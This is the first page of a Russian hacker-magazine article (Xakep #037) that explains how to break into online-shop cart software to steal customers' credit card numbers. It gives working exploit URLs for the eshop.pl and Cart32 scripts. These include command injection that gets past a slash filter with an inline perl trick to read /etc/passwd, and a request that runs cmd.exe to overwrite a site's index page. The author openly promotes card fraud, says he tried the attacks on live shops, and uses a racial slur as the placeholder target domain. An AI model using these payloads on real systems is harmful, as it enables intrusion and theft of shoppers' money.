Потребительская корзина хакеров

Xakep, номер #037, стр. 037-056-1

Большинство дырок в софте онлайн-магазинов

VOY aka Гребенников Роман (voy@zlo.cc)

СС... как много эти вещи значат в жизни рядового компьютерного хулигана: тут и нормальные приличные шеллы, и платные хостинги с доменным именем второго уровня, и отсутствие проблем с регистрацией проги, к которой кряка не существует даже в природе. И все так хорошо стало, радужно, только один вопрос волнует голову: где их взять? Где их раскопал какой-то баран на #cc? Как это так, он может, а я нет? Так и до комплекса неполноценности дорасти можно. В этой статье я попытаюсь рассказать о наиболее простом и "прибыльном" способе отъема денег населения :). А точнее, у зажравшихся америкосов, покупателей их буржуазных онлайн-магазинов :). Займемся мы взломами систем "shopping cart", на которых и лежит бремя ответственности за деньги честных пользователей Интернета.

[ eshop.pl ]

Полное название:

Webdiscount E-Shop Online Shop System

Диагноз:

Удаленное исполнение команд на сервере

Эксплоит:

www.niggers.org/cgi-bin/eshop.pl?seite=;ls|

(здесь и далее www.niggers.org - это атакуемый сайт)

Описание:

В самом коде скрипта отсутствует большинство проверок на метасимволы. Единственная проверка это

if ((index($seite, "/") >= 0) || (index($seite, "..") >= 0))

{

print "a";

exit(0);

}

что говорит о том, что скрипт отфильтровывает из аргумента только символы "/" и "..". Это затрудняет использование уязвимости, но все-таки позволяет выполнять ЛЮБЫЕ команды, даже те, в которых есть символ "/". Использование: мы не можем использовать символ "/", но что нам мешает его сгенерировать при помощи перла и подставить его в команду? Вместо "/" подставляем в команду вот такую конструкцию `perl -e 'print "x2f"x1'` (Вместе со ВСЕМИ кавычками и апострофами!). Теперь, чтобы сделать листинг корневой директории, нам надо всего лишь ввести в браузере:

www.niggers.org/cgi-bin/eshop.pl?seite=;ls -la `perl -e 'print "x2f"x1'` (листинг корня диска)

www.niggers.org/cgi-bin/eshop.pl?seite=;cat `perl -e 'print "x2f"x1'`etc`perl -e 'print "x2f"x1'`passwd (пассворды)

Частота использования: Встречается очень редко (балл: 2 (из 5))

(если найдешь этот скрипт на www.azl.de, то и не мечтай его использовать. Там все исправлено вручную после пикника с ночевкой у них на винчестере, который кто-то устроил :).

[ cart32.exe ]

Полное название:

McMurtrey/Whitaker & Associates Cart32 Shopping System

Диагноз:

Пользование всей базы заказов и исполнение команд на сервере, DOS-атака

Эксплоит:

(1) www.niggers.org/cgi-bin/cart32.exe/cart32clientlist

(2) www.niggers.org/cgi-bin/c32web.exe

(3) www.niggers.org/cgi-bin/c32web.exe/showprogress

(4) www.niggers.org/cgi-bin/c32web.exe?tabname=cart32%2B&action=save+cart32%2B+tab&savetab=cart32%2Bclient=!Loginname!&clientpassword=!password!&Admin=&adminpassword=&tabtosave=cart32%2Bplustabtosave=run+external+program&usecmdline=yes&cmdline=cmd.exe+echo+hello, world!>c:/inetpub/wwwroot/www.niggers.org/index.htm

(5) www.niggers.org/cgi-bin/cart32.exe/expdate

Описание:

Использовать эту уязвимость можно только на корзинках версии меньше 3.5а, причем таковых в Интернете немерено: обычный запрос на www.altavista.com выдал мне примерно 110 результатов, что, поверь мне, немало. Штук пять я сам попробовал, но кредиток почему-то там не оказалось. Видимо, корзинку ставили просто ради пробы и забыли ее удалить.

Содержание  Вперед на стр. 037-056-2

ttfb: 3.4990310668945 ms